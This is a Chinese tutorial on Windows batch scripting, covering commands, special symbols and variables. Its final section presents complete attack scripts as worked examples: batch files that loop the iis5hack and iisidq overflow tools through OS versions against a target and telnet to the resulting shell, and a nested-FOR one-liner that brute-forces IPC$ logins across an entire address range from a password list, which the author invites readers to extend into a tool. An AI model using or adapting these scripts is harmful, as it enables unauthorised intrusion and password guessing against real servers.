批處理命令詳解
最近好多猜測(cè)弱口令的病毒在網(wǎng)上流行，比如前段時(shí)間鬧得很厲害的Worm.Dvldr 蠕蟲就是一個(gè)典型。這些病毒有個(gè)共同點(diǎn)就是利用批處理來(lái)進(jìn)行ipc$連接，從而來(lái)猜測(cè)管理員的口令達(dá)到控制服務(wù)器的目的。病毒由幾個(gè)文件和幾個(gè)復(fù)雜的批處理組成。批處理算不上真正意義上的編程，但是它的一些思想和編程比較近似。通過(guò)在網(wǎng)上和一些初學(xué)的朋友交流，發(fā)現(xiàn)他們對(duì)于批處理很感興趣，多多少少了解一些命令的用法，但缺乏比較系統(tǒng)的了解，所以特意寫下這篇教程，好讓感興趣的朋友對(duì)批處理有個(gè)整體的認(rèn)識(shí)，并能通過(guò)該教程舉一反三，寫出自己的批處理。
該教程一共分為4大部分，第一部分是批處理的專用命令，第二部分是特殊的符號(hào)與批處理，第三部分是批處理與變量，第四部分是完整案例。因?yàn)榻坛瘫容^長(zhǎng)，所有在雜志上我們將分為兩次連載，本期首先刊登一、二兩部分，敬請(qǐng)讀者注意。

第一部分：批處理的專用命令

批處理文件是將一系列命令按一定的順序集合為一個(gè)可執(zhí)行的文本文件，其擴(kuò)展名為BAT。這些命令統(tǒng)稱批處理命令，下面我就來(lái)給大家介紹一下批處理的命令。
1、? ???REM
REM 是個(gè)注釋命令一般是用來(lái)給程序加上注解的，該命令后的內(nèi)容在程序執(zhí)行的時(shí)候?qū)⒉粫?huì)被顯示和執(zhí)行。例：
REM 你現(xiàn)在看到的就是注解，這一句將不會(huì)被執(zhí)行。在以后的例子中解釋的內(nèi)容都REM 會(huì)放在REM后面。請(qǐng)大家注意。

2、? ???ECHO
ECHO 是一個(gè)回顯命令主要參數(shù)有OFF和 ON,一般用ECHO message來(lái)顯示一個(gè)特定的消息 。例：
Echo off
Rem 以上代表關(guān)閉回顯即不顯示所執(zhí)行的命令
Echo 這個(gè)就是消息。
Rem 以上代表顯示“這就是消息”這列字符
執(zhí)行結(jié)果：
C:\>ECHO.BAT
這個(gè)就是消息。

3、? ???GOTO
GOTO 即為跳轉(zhuǎn)的意思。在批處理中允許以“：XXX”來(lái)構(gòu)建一個(gè)標(biāo)號(hào)然后用GOTO ：標(biāo)號(hào)直接來(lái)執(zhí)行標(biāo)號(hào)后的命令。例
:LABEL
REM 上面就是名為L(zhǎng)ABEL的標(biāo)號(hào)。
DIR C:\
DIR D:\
GOTO LABEL
REM 以上程序跳轉(zhuǎn)標(biāo)號(hào)LABEL處繼續(xù)執(zhí)行。

4、CALL
CALL 命令可以在批處理執(zhí)行過(guò)程中調(diào)用另一個(gè)批處理，當(dāng)另一個(gè)批處理執(zhí)行完后再繼續(xù)執(zhí)行原來(lái)的批處理。例：
批處理2.BAT內(nèi)容如下：
ECHO 這就是2的內(nèi)容
批處理1.BAT內(nèi)容如下：
ECHO 這是1的內(nèi)容
CALL 2.BAT
ECHO 1和2的內(nèi)容全部顯示完成
執(zhí)行結(jié)果如下：
? ?? ?C:\>1.BAT
? ?? ?這是1的內(nèi)容
??這就是2的內(nèi)容
? ?? ?1和2的內(nèi)容全部顯示完成

5、PAUSE
PAUSE 停止系統(tǒng)命令的執(zhí)行并顯示下面的內(nèi)容。例：
C:\> PAUSE
請(qǐng)按任意鍵繼續(xù) . . .

6、? ???IF
IF 條件判斷語(yǔ)句，語(yǔ)法格式如下：
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
說(shuō)明：
[NOT] 將返回的結(jié)果取反值即“如果沒(méi)有”的意思。
ERRORLEVEL 是命令執(zhí)行完成后返回的退出值
Number 退出值的數(shù)字取值范圍0~255。判斷時(shí)值的排列順序應(yīng)該又大到小。返回的值大于或等于指定的值時(shí)條件成立。
string1==string2 string1和string2都為字符的數(shù)據(jù)，英文字符的大小寫將看做不同，這個(gè)條件中的等于號(hào)必須是2個(gè)（絕對(duì)相等），條件想等后即執(zhí)行后面的 command
EXIST filename 為文件或目錄存在的意思。
IF ERRORLEVEL這條語(yǔ)句必須放在某一個(gè)命令后面。執(zhí)行命令后由IF ERRORLEVEL來(lái)判斷命令的返回值。
例：
1、? ???IF [NOT] ERRORLEVEL number command
檢測(cè)命令執(zhí)行完后的返回值做出判斷。
echo off
dir z:
rem 如果退出代碼為1（不成功）就跳至標(biāo)題1處執(zhí)行
IF ERRORLEVEL 1 goto 1
rem 如果退出代碼為0（成功）就跳至標(biāo)題0處執(zhí)行
IF ERRORLEVEL 0 goto 0
:0
echo 命令執(zhí)行成功！
Rem 程序執(zhí)行完畢跳至標(biāo)題exit處退出
goto exit
:1
echo 命令執(zhí)行失敗！
Rem 程序執(zhí)行完畢跳至標(biāo)題exit處退出
goto exit
:exit
Rem 這里是程序的出口
2、? ???IF string1==string2 command
檢測(cè)當(dāng)前變量的值做出判斷
ECHO OFF
IF %1==2 goto no
Echo 變量相等！
Goto exit
:no
echo 變量不相等
goto exit
:exit
大家可以這樣看效果 C:\>test.bat 數(shù)字

3、? ???IF [NOT] EXIST filename command
發(fā)現(xiàn)特定的文件做出判斷
echo off
IF not EXIST autoexec.bat goto 1
echo 文件存在成功！
goto exit
:1
echo 文件不存在失敗！
goto exit
:exit
這個(gè)批處理大家可以放在c盤和d盤分別執(zhí)行看看效果。
7、? ???FOR
FOR這個(gè)命令比較特殊是一個(gè)循環(huán)執(zhí)行命令的命令，同時(shí)FOR的循環(huán)里面還可以套用FOR在進(jìn)行循環(huán)。這篇我們介紹基本的用法就不做套用的循環(huán)了，后面再來(lái)講解套用的循環(huán)。在批處理中FOR的命令如下：
FOR [%%c] IN (set) DO [command] [arguments]
在命令行中命令如下：
FOR [%c] IN (set) DO [command] [arguments]
常用參數(shù)：
/L 該集表示以增量形式從開始到結(jié)束的一個(gè)數(shù)字序列。因此，(1,1,5) 將產(chǎn)生序列 1 2 3 4 5，(5,-1,1) 將產(chǎn)生序列 (5 4 3 2 1)。
/D 如果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。

/F 從指定的文件中讀取數(shù)據(jù)作為變量
eol=c? ?? ? - 指一個(gè)行注釋字符的結(jié)尾(就一個(gè))
skip=n? ?? ? - 指在文件開始時(shí)忽略的行數(shù)。
delims=xxx? ???- 指分隔符集。這個(gè)替換了空格和跳格鍵的默認(rèn)分隔符集。
tokens=x,y,m-n - 指每行的哪一個(gè)符號(hào)被傳遞到每個(gè)迭代的 for 本身。這會(huì)導(dǎo)致額外變量名稱的分配。m-n格式為一個(gè)范圍。通過(guò) nth 符號(hào)指定 mth。如果符號(hào)字符串中的最后一個(gè)字符星號(hào)，那么額外的變量將在最后一個(gè)符號(hào)解析之后分配并接受行的保留文本。
usebackq? ???- 指定新語(yǔ)法已在下類情況中使用:在作為命令執(zhí)行一個(gè)后引號(hào)的字符串并且一個(gè)單引號(hào)字符為文字字符串命令并允許在 filenameset中使用雙引號(hào)擴(kuò)起文件名稱。
下面來(lái)看一個(gè)例子：
FOR /F “eol=; tokens=2,3* delims=, ” %i in (myfile.txt) do @echo %i %j %k
會(huì)分析 myfile.txt 中的每一行，忽略以分號(hào)打頭的那些行，將每行中的第二個(gè)和第三個(gè)符號(hào)傳遞給 for 程序體；用逗號(hào)和/或空格定界符號(hào)。請(qǐng)注意，這個(gè) for 程序體的語(yǔ)句引用 %i 來(lái)取得第二個(gè)符號(hào)，引用 %j 來(lái)取得第三個(gè)符號(hào)，引用 %k來(lái)取得第三個(gè)符號(hào)后的所有剩余符號(hào)。對(duì)于帶有空格的文件名，您需要用雙引號(hào)將文件名括起來(lái)。為了用這種方式來(lái)使用雙引號(hào)，您還需要使用 usebackq 選項(xiàng)，否則，雙引號(hào)會(huì)被理解成是用作定義某個(gè)要分析的字符串的。
%i 專門在 for 語(yǔ)句中得到說(shuō)明，%j 和 %k 是通過(guò)tokens= 選項(xiàng)專門得到說(shuō)明的。您可以通過(guò) tokens= 一行指定最多 26 個(gè)符號(hào)，只要不試圖說(shuō)明一個(gè)高于字母 ‘z’ 或’Z’ 的變量。請(qǐng)記住，F(xiàn)OR 變量名分大小寫，是通用的；而且，同時(shí)不能有 52 個(gè)以上都在使用中。
您還可以在相鄰字符串上使用 FOR /F 分析邏輯；方法是，用單引號(hào)將括號(hào)之間的 filenameset 括起來(lái)。這樣，該字符串會(huì)被當(dāng)作一個(gè)文件中的一個(gè)單一輸入行。最后，您可以用 FOR /F 命令來(lái)分析命令的輸出。方法是，將括號(hào)之間的 filenameset 變成一個(gè)反括字符串。該字符串會(huì)被當(dāng)作命令行，傳遞到一個(gè)子 CMD.EXE，其輸出會(huì)被抓進(jìn)內(nèi)存，并被當(dāng)作文件分析。因此，以下例子:
FOR /F “usebackq delims==” %i IN (`set`) DO @echo %i
會(huì)枚舉當(dāng)前環(huán)境中的環(huán)境變量名稱。
以下列舉一個(gè)簡(jiǎn)單的例子，他將說(shuō)明參數(shù)/L和沒(méi)有參數(shù)的區(qū)別：
刪除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT
例：
ECHO OFF
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
或
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
以上2條命令執(zhí)行的結(jié)果都是一樣的如下：
C:\>DEL 1.TXT
C:\>DEL 2.TXT
C:\>DEL 3.TXT
C:\>DEL 4.TXT
C:\>DEL 5.TXT

8、? ???SETLOCAL
開始批處理文件中環(huán)境改動(dòng)的本地化操作。在執(zhí)行 SETLOCAL 之后
所做的環(huán)境改動(dòng)只限于批處理文件。要還原原先的設(shè)置，必須執(zhí)
行 ENDLOCAL。 達(dá)到批處理文件結(jié)尾時(shí)，對(duì)于該批處理文件的每個(gè)
尚未執(zhí)行的 SETLOCAL 命令，都會(huì)有一個(gè)隱含的 ENDLOCAL 被
執(zhí)行。例：
@ECHO OFF
SET PATH? ?? ? /*察看環(huán)境變量PATH
PAUSE
SETLOCAL
SET PATH=E:\TOOLS? ?/*重新設(shè)置環(huán)境變量PATH
SET PATH
PAUSE
ENDLOCAL
SET PATH
從上例我們可以看到環(huán)境變量PATH第1次被顯示得時(shí)候是系統(tǒng)默認(rèn)路徑。被設(shè)置成了E:\TOOLS后顯示為E:\TOOLS但當(dāng)ENDLOCAL后我們可以看到他又被還原成了系統(tǒng)的默認(rèn)路徑。但這個(gè)設(shè)置只在該批處理運(yùn)行的時(shí)候有作用。當(dāng)批處理運(yùn)行完成后環(huán)境變量PATH將會(huì)還原。

9、? ???SHIFT
SHIFT命令可以讓在命令上的的命令使用超過(guò)10個(gè)（%0~%9）以上的可替代參數(shù)例：
ECHO OFF
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
執(zhí)行結(jié)果如下：
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
以上就是基于WIN2000下的9個(gè)批處理命令。

第二部分：特殊的符號(hào)與批處理

在命令行下有些符號(hào)是不允許使用的但有些符號(hào)卻有著特殊的意義。
1、? ???符號(hào)(@)
@在批處理中的意思是關(guān)閉當(dāng)前行的回顯。我們從上面知道用命令echo off可以關(guān)掉整個(gè)批處理的命令回顯但卻不能不顯示echo off這個(gè)命令。現(xiàn)在我們?cè)谶@個(gè)命令前加上@這樣echo off這一命令就被@關(guān)閉了回顯從而達(dá)到所有命令均不回顯得要求
2、? ???符號(hào)(>)
>的意思是傳遞并覆蓋。他所起的作用是將運(yùn)行后的回顯結(jié)果傳遞到后面的范圍（后面可是文件也可是默認(rèn)的系統(tǒng)控制臺(tái)）例：
文件1.txt的文件內(nèi)容為：
1+1
使用命令c:\>dir *.txt >1.txt
這時(shí)候1.txt的內(nèi)容如下
驅(qū)動(dòng)器 C 中的卷沒(méi)有標(biāo)簽。
卷的序列號(hào)是 301A-1508
C:\ 的目錄
2003-03-11 14:04? ?? ?? ???1,005 FRUNLOG.TXT
2003-04-04 16:38? ?? ? 18,598,494 log.txt
2003-04-04 17:02? ?? ?? ?? ? 5 1.txt
2003-03-12 11:43? ?? ?? ?? ? 0 aierrorlog.txt
2003-03-30 00:35? ?? ?? ???30,571 202.108.txt
? ?? ?? ? 5 個(gè)文件? ?18,630,070 字節(jié)
? ?? ?? ? 0 個(gè)目錄 1,191,542,784 可用字節(jié)
>將命令執(zhí)行的結(jié)果覆蓋了原始的文件內(nèi)容。
在傳遞給控制臺(tái)的時(shí)候程序?qū)⒉粫?huì)有任何回顯（注意：這里的回顯跟echo off關(guān)掉的回顯不是同一概念。Echo off關(guān)掉的是輸入命令的回顯，這里的回顯是程序執(zhí)行中或后的回顯）例：
C:\>dir *.txt >nul
程序?qū)](méi)有任何顯示也不會(huì)產(chǎn)生任何痕跡。
3、? ???符號(hào)(>>)
符號(hào)>>的作用與符號(hào)>相似，但他們的區(qū)別在于>>是傳遞并在文件末尾追加>>也可將回顯傳遞給控制臺(tái)（用法同上）例：
文件1.txt內(nèi)同為：
1+1
使用命令c:\>dir *.txt >>1.txt
這時(shí)候1.txt的內(nèi)容如下
1+1
驅(qū)動(dòng)器 C 中的卷沒(méi)有標(biāo)簽。
卷的序列號(hào)是 301A-1508
C:\ 的目錄
2003-03-11 14:04? ?? ?? ???1,005 FRUNLOG.TXT
2003-04-04 16:38? ?? ? 18,598,494 log.txt
2003-04-04 17:02? ?? ?? ?? ? 5 1.txt
2003-03-12 11:43? ?? ?? ?? ? 0 aierrorlog.txt
2003-03-30 00:35? ?? ?? ???30,571 202.108.txt
? ?? ?? ? 5 個(gè)文件? ?18,630,070 字節(jié)
? ?? ?? ? 0 個(gè)目錄 1,191,542,784 可用字節(jié)
>>將命令執(zhí)行的結(jié)果覆加在了原始的文件內(nèi)容后面。
4、? ???符號(hào)(|)
|是一個(gè)管道傳輸命令意思是將上一命令執(zhí)行的結(jié)果傳遞給下一命令去處理。例：
C:\>dir c:\|find “1508″
卷的序列號(hào)是 301A-1508
以上命令的意思為查找c:\的所有并發(fā)現(xiàn)1508字符串。Find的用法請(qǐng)用 find /?自行查看
在不使用format的自動(dòng)格式化參數(shù)的時(shí)候我是這樣來(lái)自動(dòng)格式化盤片的
echo y|fornat a: /s /q /v:system
用過(guò)format命令的人都知道format有一個(gè)交互對(duì)化過(guò)程，要使用者輸入y來(lái)確定當(dāng)前的命令是否被執(zhí)行。在這個(gè)命令前加上echo y并用管道傳輸符|將echo執(zhí)行的結(jié)果y傳遞給format從而達(dá)到手工輸入y的目的（這條命令有危害性，測(cè)試的時(shí)候請(qǐng)謹(jǐn)慎）
5、? ???符號(hào)(^)
^ 是對(duì)特殊符號(hào) > 、echo test ^> 1.txt
test > 1.txt
從上面可以看出并沒(méi)有把test寫入文件1.txt而是將test >1.txt 當(dāng)字符串顯示了出來(lái)。這個(gè)符號(hào)在遠(yuǎn)程構(gòu)建批處理的時(shí)候很有效果。
6、? ???符號(hào)(&)
&符號(hào)允許在一行中使用2個(gè)以上不同的命令，當(dāng)?shù)谝粋€(gè)命令執(zhí)行失敗將不影響第2個(gè)命令的執(zhí)行。例：
c:\> dir z:\ &dir y:\ &dir c:\
以上的命令將會(huì)連續(xù)顯示z: y: c:盤內(nèi)的內(nèi)容不理會(huì)該盤符是否存在。
7、? ???符號(hào)(&&)
&&符號(hào)也是允許在一行中使用2個(gè)以上不同的命令，當(dāng)?shù)谝粋€(gè)命令執(zhí)行失敗后后續(xù)的命令將不會(huì)再被執(zhí)行。例：
c:\> dir z:\ &&dir y:\ &&dir c:\
以上的命令將會(huì)提示檢查是否存在z:盤如果存在則執(zhí)行，如果不存在則停止執(zhí)行所有的后續(xù)命令
8、? ???符號(hào)(” “)
” “符號(hào)允許在字符串中包含空格。進(jìn)入一個(gè)特殊的目錄可以用如下方法例:
c:\>cd “Program Files”
c:\>cd progra~1
c:\>cd pro*
以上方法都可以進(jìn)入Program Files目錄
9、? ???符號(hào)（,）
,符號(hào)相當(dāng)于空格。在某些特殊的情況下可以用,來(lái)代替空格使用。例：
c:\>dir,c:\
10、? ???符號(hào)(;)
;符號(hào)當(dāng)命令相同的時(shí)候可以將不同的目標(biāo)用;隔離開來(lái)但執(zhí)行效果不變。如執(zhí)行過(guò)程中發(fā)生錯(cuò)誤則只返回錯(cuò)誤報(bào)告但程序還是會(huì)繼續(xù)執(zhí)行。例：
DIR C:\;D:\;E:\F:\
以上的命令相當(dāng)于
DIR C:\
DIR D:\
DIR E:\
DIR F:\
當(dāng)然還有些特殊的符號(hào)但他們的使用范圍很小我就不再這里一一的說(shuō)明了。

第三部分：批處理與變量

在批處理中適當(dāng)?shù)囊米兞繉?huì)使你所編制的程序應(yīng)用面更廣。批處理每次能處理的變量從%0~%9共10個(gè)。其中%0默認(rèn)給批處理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一個(gè)%0那么結(jié)果如下：
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT.BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
系統(tǒng)是如何區(qū)分每個(gè)變量的呢，系統(tǒng)區(qū)分變量的規(guī)則為字符串中間的空格，即只要發(fā)現(xiàn)空格就把空格前面的字符當(dāng)作一個(gè)變量而空格后面的字符則作為另一個(gè)變量。如果你的變量是一個(gè)當(dāng)中包含空格的長(zhǎng)目錄名這時(shí)候你需要用上一節(jié)特殊符號(hào)8中所用的引號(hào)將他圈起來(lái)。例：
批處理內(nèi)容為：
ECHO %1
ECHO %2
ECHO %3
輸入命令：
C:\>TEST “Program Files” Program Files
Program Files
Program
Files
在一個(gè)復(fù)雜的批處理中又可能同時(shí)使用的變量會(huì)超過(guò)10個(gè)這時(shí)候會(huì)和系統(tǒng)的規(guī)則想沖突那么這個(gè)問(wèn)題怎么解決呢？在系統(tǒng)中還有一種變量稱之為環(huán)境變量（使用SET命令可以查看當(dāng)前系統(tǒng)的環(huán)境變量）如當(dāng)前系統(tǒng)目錄是%windir%或%SystemRoot%等。當(dāng)同時(shí)使用的參數(shù)超過(guò)10個(gè)的時(shí)候，我們可以把某些在后面的程序中還要調(diào)用的變量保存為環(huán)境變量。具體用法如 SET A=%1 這樣我們就命名了一個(gè)新的環(huán)境變量A 在調(diào)用變量A的時(shí)候要%A%這樣調(diào)用，環(huán)境變量不受SHIFT命令影響。如果要改變一個(gè)環(huán)境變量需要重新對(duì)其設(shè)置才能改變。當(dāng)然也可以進(jìn)行變量與變量之間的傳遞來(lái)達(dá)到目的。下面我們來(lái)看一個(gè)例子，批處理如下：
ECHO OFF
SET PASS=%1
SHIFT
SET PASS1=%1
SHIFT
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %PASS% %PASS1% %9
SET PASS=%PASS1%? ?? ? 變量的傳遞
SET PASS1=%9
SHIFT
ECHO %PASS% %PASS1% %9
使用命令：C:\>TEST A B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K 注意：這一行顯示了11個(gè)變量
A B L? ?? ?? ???在使用了3次SHIFT之后%9變成了L
B L? ?? ?? ?? ? 變量的傳遞后的結(jié)果

第四部分：完整案例

以上就是批處理的一些用法。現(xiàn)在我們把這些用法結(jié)合起來(lái)詳細(xì)的分析一下目前網(wǎng)上發(fā)布的一些批處理，看看他們是怎么運(yùn)作的。這里我將列舉三個(gè)例子來(lái)詳細(xì)分析，為了保持程序的完整我的注釋會(huì)加在/*后面。
例一
這個(gè)例子是利用iis5hack.exe對(duì)有.printer漏洞的主機(jī)進(jìn)行溢出的批處理。用到的程序有iis5hack.exe和系統(tǒng)自帶的telnet.exe。iis5hack的命令格式為：
iis5hack 目標(biāo)版本為0-9這10個(gè)數(shù)字分別對(duì)應(yīng)不同語(yǔ)言版本和sp的系統(tǒng)版本，我們編制的批處理使用的命令格式為 開始版本號(hào)可有可無(wú)。程序如下。
@echo off? ?? ?? ?? ?? ?? ? /*關(guān)閉命令回顯
if “%1%”==”" goto help? ?? ?? ???/*判斷%1是否為空，%1為目標(biāo)ip
if “%2%”==”1″ goto 1? ?? ?? ?? ? /*判斷%2是否為1，為1則跳轉(zhuǎn)標(biāo)志1
if “%2%”==”2″ goto 2? ?? ?? ?? ? /*%2為開始版本號(hào)，如果沒(méi)有設(shè)置則
if “%2%”==”3″ goto 3? ?? ?? ?? ? /*如果存在則從匹配的地方開始執(zhí)行
if “%2%”==”4″ goto 4
if “%2%”==”5″ goto 5
if “%2%”==”6″ goto 6
if “%2%”==”7″ goto 7
if “%2%”==”8″ goto 8
if not EXIST iis5hack.exe goto file /*沒(méi)有發(fā)現(xiàn)iis5hack.exe就執(zhí)行標(biāo)志file段內(nèi)容
ping %1 -n 1 | find “Received = 1″ /*ping目標(biāo)1次，從結(jié)果中發(fā)現(xiàn)Received = 1
if errorlevel 1 goto error? ?? ? /*如果返回代碼為1則執(zhí)行error段(代碼1為沒(méi)有發(fā)現(xiàn) 0為發(fā)現(xiàn)并成功執(zhí)行)
iis5hack %1 80 9 88 | find “good” /*開始溢出目標(biāo)端口80 系統(tǒng)代碼9 溢出后連接端口88 在執(zhí)行結(jié)果中發(fā)現(xiàn)字符串”good”(溢出成功后才會(huì)有字符串good)
if not errorlevel 1 goto telnet? ???/*如果沒(méi)有錯(cuò)誤代碼1（溢出成功）就執(zhí)行telnet段的內(nèi)容。
echo 操作系統(tǒng)類型 9 失敗!? ?/否則顯示這一句
:8? ?? ?? ?? ?? ?? ? /*以下代碼內(nèi)容參照上面
iis5hack %1 80 8 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 8 失敗!
:7
iis5hack %1 80 7 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 7 失敗!
:6
iis5hack %1 80 6 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 6 失敗!
:5
iis5hack %1 80 5 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 5 失敗!
:4
iis5hack %1 80 4 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 4 失敗!
:3
iis5hack %1 80 3 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 3 失敗!
:2
iis5hack %1 80 2 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 2 失敗!
:1
iis5hack %1 80 1 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 1 失敗!
:0
iis5hack %1 80 0 88 | find “good”
if not errorlevel 1 goto telnet
echo 操作系統(tǒng)類型 0 失敗!
goto error
:telnet
telnet %1 88? ?? ?? ?? ?? ?/*開始連接目標(biāo)ip的88端口
goto exit? ?? ?? ?? ?? ???/*連接中斷后跳轉(zhuǎn)exit段
:error? ?? ?? ?? ?? ???/*error段顯示錯(cuò)誤后的幫助信息
echo 可能網(wǎng)絡(luò)不能連接或者對(duì)方以修補(bǔ)該漏洞!請(qǐng)按照下面的格式手工嘗試一次!
echo iis5hack [目標(biāo)IP] [WEB端口] [系統(tǒng)類型] [開放端口]
ECHO 中文:? ?? ?? ?0
ECHO 中文+sp1:? ???1
ECHO 英文:? ?? ?? ?2
ECHO 英文+sp1:? ???3
ECHO 日語(yǔ):? ?? ?? ?4
ECHO 日語(yǔ)+sp1:? ???5
ECHO 韓文:? ?? ?? ?6
ECHO 韓文+sp1:? ???7
ECHO 墨西哥語(yǔ):? ???8
ECHO 墨西哥語(yǔ)+sp1:? ?9
goto exit? ?? ? /*跳轉(zhuǎn)exit段
:file? ?? ?? ???/*file段顯示文件沒(méi)有發(fā)現(xiàn)的信息
echo 文件iis5hack.exe沒(méi)有發(fā)現(xiàn)!程序終止運(yùn)行!
goto exit? ?? ? /*跳轉(zhuǎn)exit段
:help? ?? ?? ?/*help段顯示本批處理的使用格式幫助
echo 本程序用法如下:
echo iis [目標(biāo)ip]
echo iis [目標(biāo)ip] [開始的號(hào)碼9-0]
:exit? ?? ?? ???/*exit段為程序出口
這個(gè)批處理基本沒(méi)有什么循環(huán)只是一路走下來(lái)。所以代碼比較長(zhǎng)難度不大！
例二
這個(gè)例子是用iisidq.exe對(duì)有idq漏洞的機(jī)器進(jìn)行溢出的批處理。使用的程序有iisidq.exe和系統(tǒng)自帶的程序telnet.exe。iisidq.exe的用法如下：
運(yùn)行參數(shù): 操作系統(tǒng)類型 目的地址 web端口 1 溢出監(jiān)聽(tīng)端口
??其中,如果輸入命令參數(shù)沒(méi)有輸入,那么,默認(rèn)為:”cmd.exe”。
其中操作系統(tǒng)類型類型的代碼范圍是0-14。我們編制的批處理使用的命令格式為 程序如下：
@echo off? ?? ?? ?? ?? ?/*同例一
if not EXIST iisidq.exe goto file? ?/*同例一
if %1 == “” goto error? ?? ?? ?/*同例一
ping %1 -n 1 | find “Received = 1″? ?/*同例一
if errorlevel 1 goto error1? ?? ? /*同例一
set b=%1? ?? ? /*創(chuàng)建一個(gè)環(huán)境變量b,將變量%1的內(nèi)容傳遞給環(huán)境變量b。變量b的內(nèi)容以后將是目標(biāo)ip
set a=0? ?? ?? ?/*創(chuàng)建一個(gè)環(huán)境變量a并指定環(huán)境變量a為0。由于使用整個(gè)批處理的循環(huán)所以用a來(lái)做計(jì)數(shù)器。
:no? ?? ?? ???/*no段開始
if %a%==0 set d=0 /*如果環(huán)境變量a=0則創(chuàng)建環(huán)境變量d設(shè)定環(huán)境變量d=0。
if %a%==1 set d=1 /*環(huán)境變量d其實(shí)是操作系統(tǒng)類型代碼，用計(jì)數(shù)器來(lái)控制其
if %a%==2 set d=2 /*變動(dòng)。
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0? ?? ?? ???/*變量傳遞完成后轉(zhuǎn)到標(biāo)志0處運(yùn)行
:1
echo 正在執(zhí)行第%d%項(xiàng)!與目標(biāo)%b%不能連接!正在嘗試連接請(qǐng)等候……
:0? ?? ?? ?? ? /*標(biāo)志0開始
IISIDQ %d% %b% 80 1 99 |find “good” /*按格式發(fā)送溢出命令并在結(jié)果中發(fā)現(xiàn)字符串good（發(fā)送代碼成功才會(huì)有字符串good）
if errorlevel 1 goto 1? ?? ?? ?/*如果沒(méi)有g(shù)ood字符串則沒(méi)有發(fā)送成跳
/*轉(zhuǎn)標(biāo)志1處繼續(xù)嘗試發(fā)送
ping 127.0.0.1 -n 8 >nul? ?? ? /*ping自己8次相當(dāng)于延時(shí)8秒不顯示執(zhí)
/*行結(jié)果
echo 正在執(zhí)行第%d%項(xiàng)!? ?? ? /*報(bào)告正在溢出的操作系統(tǒng)類型
telnet %b% 99? ?? ?? ?? ? /*連接溢出端口
echo.? ?? ?? ?? ?? ???/*顯示一個(gè)空行
if %d%==14 goto error1? ?/*如果操作系統(tǒng)類型為14則跳轉(zhuǎn)error1處（循環(huán)出口）
if %d%==13 set a=11? ?? ?? ?/*開始用計(jì)數(shù)器對(duì)操作系統(tǒng)代碼重新附值
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no? ?? ?? ?? ?? ?? ? /*附值完成跳轉(zhuǎn)no段執(zhí)行
:file? ?? ?? ?? ?? ?? ?? ?/*以下都是出錯(cuò)后的幫助提示
echo IIsidq.exe沒(méi)有發(fā)現(xiàn)!將該文件和本文件放在同一目錄!
goto exit
:error
echo 錯(cuò)誤!目標(biāo)ip不可識(shí)別!請(qǐng)使用下面的格式連接!
echo idq [目標(biāo)IP]
goto exit
:error1
echo 連接沒(méi)有成功!可能目標(biāo)機(jī)器已經(jīng)修補(bǔ)了該漏洞或者網(wǎng)絡(luò)故障所至!
echo 請(qǐng)按照下面的格式手工嘗試!
echo iisidq [目標(biāo)類型] [目標(biāo)IP] [目標(biāo)端口] [連接方式] [溢出端口]
echo telnet [目標(biāo)ip] [溢出端口]
:exit? ?? ?? ?? ?? ?? ? /*整個(gè)程序的出口
這個(gè)批處理采用的整體循環(huán)掌握好計(jì)數(shù)器部分就掌握了這個(gè)批處理。
例三
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f “tokens=1,2*” %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
上面的命令為1條命令。大家可以看出該命令使用了4個(gè)FOR來(lái)套用的。用法為：C:\>TEST.BAT 218 當(dāng)輸入218回車后該命令會(huì)由第1個(gè)for取初始值0為%%a然后繼續(xù)取第2個(gè)for的初始值0為%%b繼續(xù)取第3個(gè)for的初始值1為%%c最后一個(gè)for是將userpass.txt中的第一段字符作為密碼%%e第二段字符作為用戶名%%f最后執(zhí)行命令 (這里我把上面的值都帶進(jìn)去，設(shè)密碼為123 用戶名為 abc)
net usr \\218.0.0.1\ipc$ 123 /u:abc
當(dāng)然上面這個(gè)例子可能有些朋友會(huì)說(shuō)太簡(jiǎn)單并且太死板不靈活。我把這個(gè)例子做了些修改（完整文件見(jiàn)光盤ipc.bat）由興趣的朋友可以自己看看。修改后的程序可以靈活的查找你指定開始到結(jié)束或你指定開始到最大ip的范圍。當(dāng)然功能還可以在加強(qiáng)，至于能加強(qiáng)到什么地步能不能成為一個(gè)新的工具那就是你的事了。
